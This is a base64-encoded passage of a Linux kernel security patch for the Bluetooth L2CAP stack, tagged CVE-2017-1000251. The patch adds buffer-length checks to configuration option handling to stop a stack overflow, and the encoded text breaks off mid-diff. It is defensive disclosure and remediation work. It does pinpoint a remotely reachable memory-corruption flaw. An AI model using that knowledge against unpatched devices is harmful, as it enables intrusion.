-RnJvbSAyZTA3M2QyMDAxZjM1NDk4MmI3NzdhMzhkOTMxMDAyYTYyMzk1ZGUxIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBCZW4gU2VyaSA8YmVuQGFybWlzLmNvbT4KRGF0ZTogU2F0LCAwOSBTZXAgMjAxNyAyMzoxNTo1OSArMDIwMApTdWJqZWN0OiBbUEFUQ0hdIEJsdWV0b290aDogUHJvcGVybHkgY2hlY2sgTDJDQVAgY29uZmlnIG9wdGlvbiBvdXRwdXQgYnVmZmVyIGxlbmd0aAoKVmFsaWRhdGUgdGhlIG91dHB1dCBidWZmZXIgbGVuZ3RoIGZvciBMMkNBUCBjb25maWcgcmVxdWVzdHMgYW5kIHJlc3BvbnNlcwp0byBhdm9pZCBvdmVyZmxvd2luZyB0aGUgc3RhY2sgYnVmZmVyIHVzZWQgZm9yIGJ1aWxkaW5nIHRoZSBvcHRpb24gYmxvY2tzLgoKQ2hhbmdlLUlkOiBJN2EwZmYwYjlkZDAxNTZjMGU2MzgzMjE0YTljODZlNGVjNGMwZDIzNgpDYzogc3RhYmxlQHZnZXIua2VybmVsLm9yZwpTaWduZWQtb2ZmLWJ5OiBCZW4gU2VyaSA8YmVuQGFybWlzLmNvbT4KU2lnbmVkLW9mZi1ieTogTWFyY2VsIEhvbHRtYW5uIDxtYXJjZWxAaG9sdG1hbm4ub3JnPgpTaWduZWQtb2ZmLWJ5OiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+CkNWRS0yMDE3LTEwMDAyNTEKU2lnbmVkLW9mZi1ieTogS2V2aW4gRi4gSGFnZ2VydHkgPGhhZ2dlcnRrQGxpbmVhZ2Vvcy5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbmV0L2JsdWV0b290aC9sMmNhcC5oIGIvaW5jbHVkZS9uZXQvYmx1ZXRvb3RoL2wyY2FwLmgKaW5kZXggZWY1ZTg0OS4uYjg2ODM0MyAxMDA2NDQKLS0tIGEvaW5jbHVkZS9uZXQvYmx1ZXRvb3RoL2wyY2FwLmgKKysrIGIvaW5jbHVkZS9uZXQvYmx1ZXRvb3RoL2wyY2FwLmgKQEAgLTY2OCw3ICs2NjgsNyBAQAogCiB1OCBsMmNhcF9nZXRfaWRlbnQoc3RydWN0IGwyY2FwX2Nvbm4gKmNvbm4pOwogdm9pZCBsMmNhcF9zZW5kX2NtZChzdHJ1Y3QgbDJjYXBfY29ubiAqY29ubiwgdTggaWRlbnQsIHU4IGNvZGUsIHUxNiBsZW4sIHZvaWQgKmRhdGEpOwotaW50IGwyY2FwX2J1aWxkX2NvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSk7CitpbnQgbDJjYXBfYnVpbGRfY29uZl9yZXEoc3RydWN0IHNvY2sgKnNrLCB2b2lkICpkYXRhLCBzaXplX3QgZGF0YV9zaXplKTsKIGludCBfX2wyY2FwX3dhaXRfYWNrKHN0cnVjdCBzb2NrICpzayk7CiAKIHN0cnVjdCBza19idWZmICpsMmNhcF9jcmVhdGVfY29ubmxlc3NfcGR1KHN0cnVjdCBzb2NrICpzaywgc3RydWN0IG1zZ2hkciAqbXNnLCBzaXplX3QgbGVuKTsKZGlmZiAtLWdpdCBhL25ldC9ibHVldG9vdGgvbDJjYXBfY29yZS5jIGIvbmV0L2JsdWV0b290aC9sMmNhcF9jb3JlLmMKaW5kZXggYWYwZGNiYS4uYTRhYjBmZiAxMDA2NDQKLS0tIGEvbmV0L2JsdWV0b290aC9sMmNhcF9jb3JlLmMKKysrIGIvbmV0L2JsdWV0b290aC9sMmNhcF9jb3JlLmMKQEAgLTkxMCw3ICs5MTAsNyBAQAogCiAJCQlsMmNhcF9waShzayktPmNvbmZfc3RhdGUgfD0gTDJDQVBfQ09ORl9SRVFfU0VOVDsKIAkJCWwyY2FwX3NlbmRfY21kKGNvbm4sIGwyY2FwX2dldF9pZGVudChjb25uKSwgTDJDQVBfQ09ORl9SRVEsCi0JCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmKSwgYnVmKTsKKwkJCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYsIHNpemVvZihidWYpKSwgYnVmKTsKIAkJCWwyY2FwX3BpKHNrKS0+bnVtX2NvbmZfcmVxKys7CiAJCX0KIApAQCAtMjg5MiwxMSArMjg5MiwxNCBAQAogCXJldHVybiBsZW47CiB9CiAKLXN0YXRpYyB2b2lkIGwyY2FwX2FkZF9jb25mX29wdCh2b2lkICoqcHRyLCB1OCB0eXBlLCB1OCBsZW4sIHVuc2lnbmVkIGxvbmcgdmFsKQorc3RhdGljIHZvaWQgbDJjYXBfYWRkX2NvbmZfb3B0KHZvaWQgKipwdHIsIHU4IHR5cGUsIHU4IGxlbiwgdW5zaWduZWQgbG9uZyB2YWwsIHNpemVfdCBzaXplKQogewogCXN0cnVjdCBsMmNhcF9jb25mX29wdCAqb3B0ID0gKnB0cjsKIAogCUJUX0RCRygidHlwZSAweCUyLjJ4IGxlbiAlZCB2YWwgMHglbHgiLCB0eXBlLCBsZW4sIHZhbCk7CisKKwlpZiAoc2l6ZSA8IEwyQ0FQX0NPTkZfT1BUX1NJWkUgKyBsZW4pCisJCXJldHVybjsKIAogCW9wdC0+dHlwZSA9IHR5cGU7CiAJb3B0LT5sZW4gID0gbGVuOwpAQCAtMzI3NSwxMiArMzI3OCwxMyBAQAogCX0KIH0KIAotaW50IGwyY2FwX2J1aWxkX2NvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSkKK2ludCBsMmNhcF9idWlsZF9jb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEsIHNpemVfdCBkYXRhX3NpemUpCiB7CiAJc3RydWN0IGwyY2FwX3BpbmZvICpwaSA9IGwyY2FwX3BpKHNrKTsKIAlzdHJ1Y3QgbDJjYXBfY29uZl9yZXEgKnJlcSA9IGRhdGE7CiAJc3RydWN0IGwyY2FwX2NvbmZfcmZjIHJmYyA9IHsgLm1vZGUgPSBwaS0+bW9kZSB9OwogCXZvaWQgKnB0ciA9IHJlcS0+ZGF0YTsKKwl2b2lkICplbmRwdHIgPSBkYXRhICsgZGF0YV9zaXplOwogCiAJQlRfREJHKCJzayAlcCIsIHNrKTsKIApAQCAtMzMwMSw3ICszMzA1LDcgQEAKIAogZG9uZToKIAlpZiAocGktPmltdHUgIT0gTDJDQVBfREVGQVVMVF9NVFUpCi0JCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX01UVSwgMiwgcGktPmltdHUpOworCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9NVFUsIDIsIHBpLT5pbXR1LCBlbmRwdHIgLSBwdHIpOwogCiAJc3dpdGNoIChwaS0+bW9kZSkgewogCWNhc2UgTDJDQVBfTU9ERV9CQVNJQzoKQEAgLTMzMTYsNyArMzMyMCw3IEBACiAJCXJmYy5tYXhfcGR1X3NpemUgICAgPSAwOwogCiAJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX1JGQywgc2l6ZW9mKHJmYyksCi0JCQkJCQkJKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCSAgICh1bnNpZ25lZCBsb25nKSAmcmZjLCBlbmRwdHIgLSBwdHIpOwogCQlicmVhazsKIAogCWNhc2UgTDJDQVBfTU9ERV9FUlRNOgpAQCAtMzMzMywxMiArMzMzNywxMiBAQAogCQkJcmZjLm1heF9wZHVfc2l6ZSA9IGNwdV90b19sZTE2KHBpLT5pbXR1KTsKIAogCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsIHNpemVvZihyZmMpLAotCQkJCQkJCSh1bnNpZ25lZCBsb25nKSAmcmZjKTsKKwkJCQkgICAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAogCQlpZiAoKHBpLT5jb25uLT5mZWF0X21hc2sgJiBMMkNBUF9GRUFUX0VYVF9XSU5ET1cpICYmCiAJCQlwaS0+ZXh0ZW5kZWRfY29udHJvbCkgewogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVywgMiwKLQkJCQkJcGktPnR4X3dpbik7CisJCQkJCSAgIHBpLT50eF93aW4sIGVuZHB0ciAtIHB0cik7CiAJCX0KIAogCQlpZiAocGktPmFtcF9pZCkgewpAQCAtMzM0Niw3ICszMzUwLDcgQEAKIAkJCXN0cnVjdCBsMmNhcF9jb25mX2V4dF9mcyBmcyA9IHsxLCAxLCAweEZGRkYsCiAJCQkJCTB4RkZGRkZGRkYsIDB4RkZGRkZGRkYsIDB4RkZGRkZGRkZ9OwogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX0ZTLAotCQkJCXNpemVvZihmcyksICh1bnNpZ25lZCBsb25nKSAmZnMpOworCQkJCXNpemVvZihmcyksICh1bnNpZ25lZCBsb25nKSAmZnMsIGVuZHB0ciAtIHB0cik7CiAJCX0KIAogCQlpZiAoIShwaS0+Y29ubi0+ZmVhdF9tYXNrICYgTDJDQVBfRkVBVF9GQ1MpKQpAQCAtMzM1NSw3ICszMzU5LDcgQEAKIAkJaWYgKHBpLT5mY3MgPT0gTDJDQVBfRkNTX05PTkUgfHwKIAkJCQlwaS0+Y29uZl9zdGF0ZSAmIEwyQ0FQX0NPTkZfTk9fRkNTX1JFQ1YpIHsKIAkJCXBpLT5mY3MgPSBMMkNBUF9GQ1NfTk9ORTsKLQkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZDUywgMSwgcGktPmZjcyk7CisJCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9GQ1MsIDEsIHBpLT5mY3MsIGVuZHB0ciAtIHB0cik7CiAJCX0KIAkJYnJlYWs7CiAKQEAgLTMzNjksMTEgKzMzNzMsMTEgQEAKIAkJCXJmYy5tYXhfcGR1X3NpemUgPSBjcHVfdG9fbGUxNihwaS0+aW10dSk7CiAKIAkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLCBzaXplb2YocmZjKSwKLQkJCQkJCQkodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJICAgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAKIAkJaWYgKChwaS0+Y29ubi0+ZmVhdF9tYXNrICYgTDJDQVBfRkVBVF9FWFRfV0lORE9XKSAmJgogCQkJcGktPmV4dGVuZGVkX2NvbnRyb2wpIHsKLQkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0VYVF9XSU5ET1csIDIsIDApOworCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVywgMiwgMCwgZW5kcHRyIC0gcHRyKTsKIAkJfQogCiAJCWlmICghKHBpLT5jb25uLT5mZWF0X21hc2sgJiBMMkNBUF9GRUFUX0ZDUykpCkBAIC0zMzgyLDcgKzMzODYsNyBAQAogCQlpZiAocGktPmZjcyA9PSBMMkNBUF9GQ1NfTk9ORSB8fAogCQkJCXBpLT5jb25mX3N0YXRlICYgTDJDQVBfQ09ORl9OT19GQ1NfUkVDVikgewogCQkJcGktPmZjcyA9IEwyQ0FQX0ZDU19OT05FOwotCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRkNTLCAxLCBwaS0+ZmNzKTsKKwkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZDUywgMSwgcGktPmZjcywgZW5kcHRyIC0gcHRyKTsKIAkJfQogCQlicmVhazsKIAl9CkBAIC0zMzk0LDEyICszMzk4LDEzIEBACiB9CiAKIAotc3RhdGljIGludCBsMmNhcF9idWlsZF9hbXBfcmVjb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEpCitzdGF0aWMgaW50IGwyY2FwX2J1aWxkX2FtcF9yZWNvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSwgc2l6ZV90IGRhdGFfc2l6ZSkKIHsKIAlzdHJ1Y3QgbDJjYXBfcGluZm8gKnBpID0gbDJjYXBfcGkoc2spOwogCXN0cnVjdCBsMmNhcF9jb25mX3JlcSAqcmVxID0gZGF0YTsKIAlzdHJ1Y3QgbDJjYXBfY29uZl9yZmMgcmZjID0geyAubW9kZSA9IHBpLT5tb2RlIH07CiAJdm9pZCAqcHRyID0gcmVxLT5kYXRhOworCXZvaWQgKmVuZHB0ciA9IGRhdGEgKyBkYXRhX3NpemU7CiAKIAlCVF9EQkcoInNrICVwIiwgc2spOwogCkBAIC0zNDIwLDcgKzM0MjUsNyBAQAogCX0KIAogCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX1JGQywgc2l6ZW9mKHJmYyksCi0JCQkJCQkodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkgICAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAogCWlmIChwaS0+Y29ubi0+ZmVhdF9tYXNrICYgTDJDQVBfRkVBVF9GQ1MpIHsKIAkJLyogVE9ETyBhc3NpZ24gZmNzIGZvciBici9lZHIgYmFzZWQgb24gc29ja2V0IGNvbmZpZyBvcHRpb24gKi8KQEAgLTM0MzEsNyArMzQzNiw3IEBACiAJCWVsc2UKIAkJCXBpLT5sb2NhbF9jb25mLmZjcyA9IEwyQ0FQX0ZDU19DUkMxNjsKIAotCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9GQ1MsIDEsIHBpLT5sb2NhbF9jb25mLmZjcyk7CisJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZDUywgMSwgcGktPmxvY2FsX2NvbmYuZmNzLCBlbmRwdHIgLSBwdHIpOwogCQlwaS0+ZmNzID0gcGktPmxvY2FsX2NvbmYuZmNzIHwgcGktPnJlbW90ZV9jb25mLmZjczsKIAl9CiAKQEAgLTM0NDEsMTEgKzM0NDYsMTIgQEAKIAlyZXR1cm4gcHRyIC0gZGF0YTsKIH0KIAotc3RhdGljIGludCBsMmNhcF9wYXJzZV9jb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEpCitzdGF0aWMgaW50IGwyY2FwX3BhcnNlX2NvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSwgc2l6ZV90IGRhdGFfc2l6ZSkKIHsKIAlzdHJ1Y3QgbDJjYXBfcGluZm8gKnBpID0gbDJjYXBfcGkoc2spOwogCXN0cnVjdCBsMmNhcF9jb25mX3JzcCAqcnNwID0gZGF0YTsKIAl2b2lkICpwdHIgPSByc3AtPmRhdGE7CisJdm9pZCAqZW5kcHRyID0gZGF0YSArIGRhdGFfc2l6ZTsKIAl2b2lkICpyZXEgPSBwaS0+Y29uZl9yZXE7CiAJaW50IGxlbiA9IHBpLT5jb25mX2xlbjsKIAlpbnQgdHlwZSwgaGludCwgb2xlbjsKQEAgLTM1NjMsNyArMzU2OSw4IEBACiAJCQlyZXR1cm4gLUVDT05OUkVGVVNFRDsKIAogCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsCi0JCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJICAgc2l6ZW9mKHJmYyksICh1bnNpZ25lZCBsb25nKSAmcmZjLAorCQkJCSAgIGVuZHB0ciAtIHB0cik7CiAJfQogCiAKQEAgLTM1ODMsNyArMzU5MCw3IEBACiAJCQlwaS0+b210dSA9IG10dTsKIAkJCXBpLT5jb25mX3N0YXRlIHw9IEwyQ0FQX0NPTkZfTVRVX0RPTkU7CiAJCX0KLQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfTVRVLCAyLCBwaS0+b210dSk7CisJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX01UVSwgMiwgcGktPm9tdHUsIGVuZHB0ciAtIHB0cik7CiAKIAkJc3dpdGNoIChyZmMubW9kZSkgewogCQljYXNlIEwyQ0FQX01PREVfQkFTSUM6CkBAIC0zNjAxLDExICszNjA4LDExIEBACiAJCQlwaS0+Y29uZl9zdGF0ZSB8PSBMMkNBUF9DT05GX01PREVfRE9ORTsKIAogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLAotCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAKIAkJCWlmIChwaS0+Y29uZl9zdGF0ZSAmIEwyQ0FQX0NPTkZfTE9DS1NURVApCiAJCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX0ZTLAotCQkJCQlzaXplb2YoZnMpLCAodW5zaWduZWQgbG9uZykgJmZzKTsKKwkJCQkJc2l6ZW9mKGZzKSwgKHVuc2lnbmVkIGxvbmcpICZmcywgZW5kcHRyIC0gcHRyKTsKIAogCQkJYnJlYWs7CiAKQEAgLTM2MTUsNyArMzYyMiw3IEBACiAJCQlwaS0+Y29uZl9zdGF0ZSB8PSBMMkNBUF9DT05GX01PREVfRE9ORTsKIAogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLAotCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAKIAkJCWJyZWFrOwogCkBAIC0zNjU5LDExICszNjY2LDEyIEBACiAJcmV0dXJuIHB0ciAtIGRhdGE7CiB9CiAKLXN0YXRpYyBpbnQgbDJjYXBfcGFyc2VfYW1wX21vdmVfcmVjb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEpCitzdGF0aWMgaW50IGwyY2FwX3BhcnNlX2FtcF9tb3ZlX3JlY29uZl9yZXEoc3RydWN0IHNvY2sgKnNrLCB2b2lkICpkYXRhLCBzaXplX3QgZGF0YV9zaXplKQogewogCXN0cnVjdCBsMmNhcF9waW5mbyAqcGkgPSBsMmNhcF9waShzayk7CiAJc3RydWN0IGwyY2FwX2NvbmZfcnNwICpyc3AgPSBkYXRhOwogCXZvaWQgKnB0ciA9IHJzcC0+ZGF0YTsKKwl2b2lkICplbmRwdHIgPSBkYXRhICsgZGF0YV9zaXplOwogCXZvaWQgKnJlcSA9IHBpLT5jb25mX3JlcTsKIAlpbnQgbGVuID0gcGktPmNvbmZfbGVuOwogCWludCB0eXBlLCBoaW50LCBvbGVuOwpAQCAtMzc1MCwxMyArMzc1OCwxMyBAQAogCiAJCUJUX0RCRygibXR1ICVkIG9tdHUgJWQiLCBtdHUsIHBpLT5vbXR1KTsKIAotCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9NVFUsIDIsIHBpLT5vbXR1KTsKKwkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfTVRVLCAyLCBwaS0+b210dSwgZW5kcHRyIC0gcHRyKTsKIAogCQkvKiBEb24ndCBhbGxvdyBleHRlbmRlZCB0cmFuc21pdCB3aW5kb3cgdG8gY2hhbmdlLiAqLwogCQlpZiAodHhfd2luICE9IHBpLT5yZW1vdGVfdHhfd2luKSB7CiAJCQlyZXN1bHQgPSBMMkNBUF9DT05GX1VOQUNDRVBUOwogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVywgMiwKLQkJCQkJcGktPnJlbW90ZV90eF93aW4pOworCQkJCQlwaS0+cmVtb3RlX3R4X3dpbiwgZW5kcHRyIC0gcHRyKTsKIAkJfQogCiAJCXBpLT5yZW1vdGVfbXBzID0gcmZjLm1heF9wZHVfc2l6ZTsKQEAgLTM3NjksNyArMzc3Nyw3IEBACiAJCX0KIAogCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsCi0JCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAl9CiAKIAlpZiAocmVzdWx0ICE9IEwyQ0FQX0NPTkZfU1VDQ0VTUykKQEAgLTM3ODgsMTEgKzM3OTYsMTIgQEAKIAlyZXR1cm4gcHRyIC0gZGF0YTsKIH0KIAotc3RhdGljIGludCBsMmNhcF9wYXJzZV9jb25mX3JzcChzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKnJzcCwgaW50IGxlbiwgdm9pZCAqZGF0YSwgdTE2ICpyZXN1bHQpCitzdGF0aWMgaW50IGwyY2FwX3BhcnNlX2NvbmZfcnNwKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqcnNwLCBpbnQgbGVuLCB2b2lkICpkYXRhLCBzaXplX3Qgc2l6ZSwgdTE2ICpyZXN1bHQpCiB7CiAJc3RydWN0IGwyY2FwX3BpbmZvICpwaSA9IGwyY2FwX3BpKHNrKTsKIAlzdHJ1Y3QgbDJjYXBfY29uZl9yZXEgKnJlcSA9IGRhdGE7CiAJdm9pZCAqcHRyID0gcmVxLT5kYXRhOworCXZvaWQgKmVuZHB0ciA9IGRhdGEgKyBzaXplOwogCWludCB0eXBlLCBvbGVuOwogCXVuc2lnbmVkIGxvbmcgdmFsOwogCXN0cnVjdCBsMmNhcF9jb25mX3JmYyByZmM7CkBAIC0zODE1LDEzICszODI0LDEzIEBACiAJCQkJcGktPmltdHUgPSBMMkNBUF9ERUZBVUxUX01JTl9NVFU7CiAJCQl9IGVsc2UKIAkJCQlwaS0+aW10dSA9IHZhbDsKLQkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX01UVSwgMiwgcGktPmltdHUpOworCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfTVRVLCAyLCBwaS0+aW10dSwgZW5kcHRyIC0gcHRyKTsKIAkJCWJyZWFrOwogCiAJCWNhc2UgTDJDQVBfQ09ORl9GTFVTSF9UTzoKIAkJCXBpLT5mbHVzaF90byA9IHZhbDsKIAkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZMVVNIX1RPLAotCQkJCQkJCTIsIHBpLT5mbHVzaF90byk7CisJCQkJCQkJMiwgcGktPmZsdXNoX3RvLCBlbmRwdHIgLSBwdHIpOwogCQkJYnJlYWs7CiAKIAkJY2FzZSBMMkNBUF9DT05GX1JGQzoKQEAgLTM4MzUsNyArMzg0NCw3IEBACiAJCQlwaS0+ZmNzID0gMDsKIAogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLAotCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAJCQlicmVhazsKIAogCQljYXNlIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVzoKQEAgLTM4NDUsNyArMzg1NCw3IEBACiAJCQkJcGktPnR4X3dpbiA9IEwyQ0FQX1RYX1dJTl9NQVhfRU5IQU5DRUQ7CiAKIAkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0VYVF9XSU5ET1csCi0JCQkJCTIsIHBpLT50eF93aW4pOworCQkJCQkyLCBwaS0+dHhfd2luLCBlbmRwdHIgLSBwdHIpOwogCQkJYnJlYWs7CiAKIAkJZGVmYXVsdDoKQEAgLTQyMDQsNyArNDIxMyw3IEBACiAJCXU4IGJ1ZlsxMjhdOwogCQlsMmNhcF9waShzayktPmNvbmZfc3RhdGUgfD0gTDJDQVBfQ09ORl9SRVFfU0VOVDsKIAkJbDJjYXBfc2VuZF9jbWQoY29ubiwgbDJjYXBfZ2V0X2lkZW50KGNvbm4pLCBMMkNBUF9DT05GX1JFUSwKLQkJCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIGJ1ZiksIGJ1Zik7CisJCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYsIHNpemVvZihidWYpKSwgYnVmKTsKIAkJbDJjYXBfcGkoc2spLT5udW1fY29uZl9yZXErKzsKIAl9CiAKQEAgLTQyNTUsNyArNDI2NCw3IEBACiAJCWwyY2FwX3BpKHNrKS0+Y29uZl9zdGF0ZSB8PSBMMkNBUF9DT05GX1JFUV9TRU5UOwogCiAJCWwyY2FwX3NlbmRfY21kKGNvbm4sIGwyY2FwX2dldF9pZGVudChjb25uKSwgTDJDQVBfQ09ORl9SRVEsCi0JCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCByZXEpLCByZXEpOworCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgcmVxLCBzaXplb2YocmVxKSksIHJlcSk7CiAJCWwyY2FwX3BpKHNrKS0+bnVtX2NvbmZfcmVxKys7CiAJCWJyZWFrOwogCkBAIC00MzU5LDkgKzQzNjgsOSBAQAogCiAJLyogQ29tcGxldGUgY29uZmlnLiAqLwogCWlmICghYW1wX21vdmVfcmVjb25mKQotCQlsZW4gPSBsMmNhcF9wYXJzZV9jb25mX3JlcShzaywgcnNwYnVmKTsKKwkJbGVuID0gbDJjYXBfcGFyc2VfY29uZl9yZXEoc2ssIHJzcGJ1Ziwgc2l6ZW9mKHJzcGJ1ZikpOwogCWVsc2UKLQkJbGVuID0gbDJjYXBfcGFyc2VfYW1wX21vdmVfcmVjb25mX3JlcShzaywgcnNwYnVmKTsKKwkJbGVuID0gbDJjYXBfcGFyc2VfYW1wX21vdmVfcmVjb25mX3JlcShzaywgcnNwYnVmLCBzaXplb2YocnNwYnVmKSk7CiAKIAlpZiAobGVuIDwgMCkgewogCQlsMmNhcF9zZW5kX2Rpc2Nvbm5fcmVxKGNvbm4sIHNrLCBFQ09OTlJFU0VUKTsKQEAgLTQ0MTAsNyArNDQxOSw3IEBACiAJCXU4IGJ1Zls2NF07CiAJCWwyY2FwX3BpKHNrKS0+Y29uZl9zdGF0ZSB8PSBMMkNBUF9DT05GX1JFUV9TRU5UOwogCQlsMmNhcF9zZW5kX2NtZChjb25uLCBsMmNhcF9nZXRfaWRlbnQoY29ubiksIEwyQ0FQX0NPTkZfUkVRLAotCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmKSwgYnVmKTsKKwkJCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIGJ1Ziwgc2l6ZW9mKGJ1ZikpLCBidWYpOwogCQlsMmNhcF9waShzayktPm51bV9jb25mX3JlcSsrOwogCX0KIApAQCAtNDUwNiw3ICs0NTE1LDcgQEAKIAkJCS8qIHRocm93IG91dCBhbnkgb2xkIHN0b3JlZCBjb25mIHJlcXVlc3RzICovCiAJCQlyZXN1bHQgPSBMMkNBUF9DT05GX1NVQ0NFU1M7CiAJCQlsZW4gPSBsMmNhcF9wYXJzZV9jb25mX3JzcChzaywgcnNwLT5kYXRhLAotCQkJCQkJCWxlbiwgcmVxLCAmcmVzdWx0KTsKKwkJCQkJCQlsZW4sIHJlcSwgc2l6ZW9mKHJlcSksICZyZXN1bHQpOwogCQkJaWYgKGxlbiA8IDApIHsKIAkJCQlsMmNhcF9zZW5kX2Rpc2Nvbm5fcmVxKGNvbm4sIHNrLCBFQ09OTlJFU0VUKTsKIAkJCQlnb3RvIGRvbmU7CkBAIC01MzA2LDcgKzUzMTUsNyBAQAogCQkJCWwyY2FwX3NlbmRfY21kKHBpLT5jb25uLAogCQkJCQlsMmNhcF9nZXRfaWRlbnQocGktPmNvbm4pLAogCQkJCQlMMkNBUF9DT05GX1JFUSwKLQkJCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIGJ1ZiksIGJ1Zik7CisJCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYsIHNpemVvZihidWYpKSwgYnVmKTsKIAkJCQlsMmNhcF9waShzayktPm51bV9jb25mX3JlcSsrOwogCQkJfQogCQl9IGVsc2UgewpAQCAtNjg3MCw3ICs2ODc5LDcgQEAKIAlwaSA9IGwyY2FwX3BpKHNrKTsKIAogCWwyY2FwX3NlbmRfY21kKHBpLT5jb25uLCBsMmNhcF9nZXRfaWRlbnQocGktPmNvbm4pLCBMMkNBUF9DT05GX1JFUSwKLQkJCQlsMmNhcF9idWlsZF9hbXBfcmVjb25mX3JlcShzaywgYnVmKSwgYnVmKTsKKwkJCQlsMmNhcF9idWlsZF9hbXBfcmVjb25mX3JlcShzaywgYnVmLCBzaXplb2YoYnV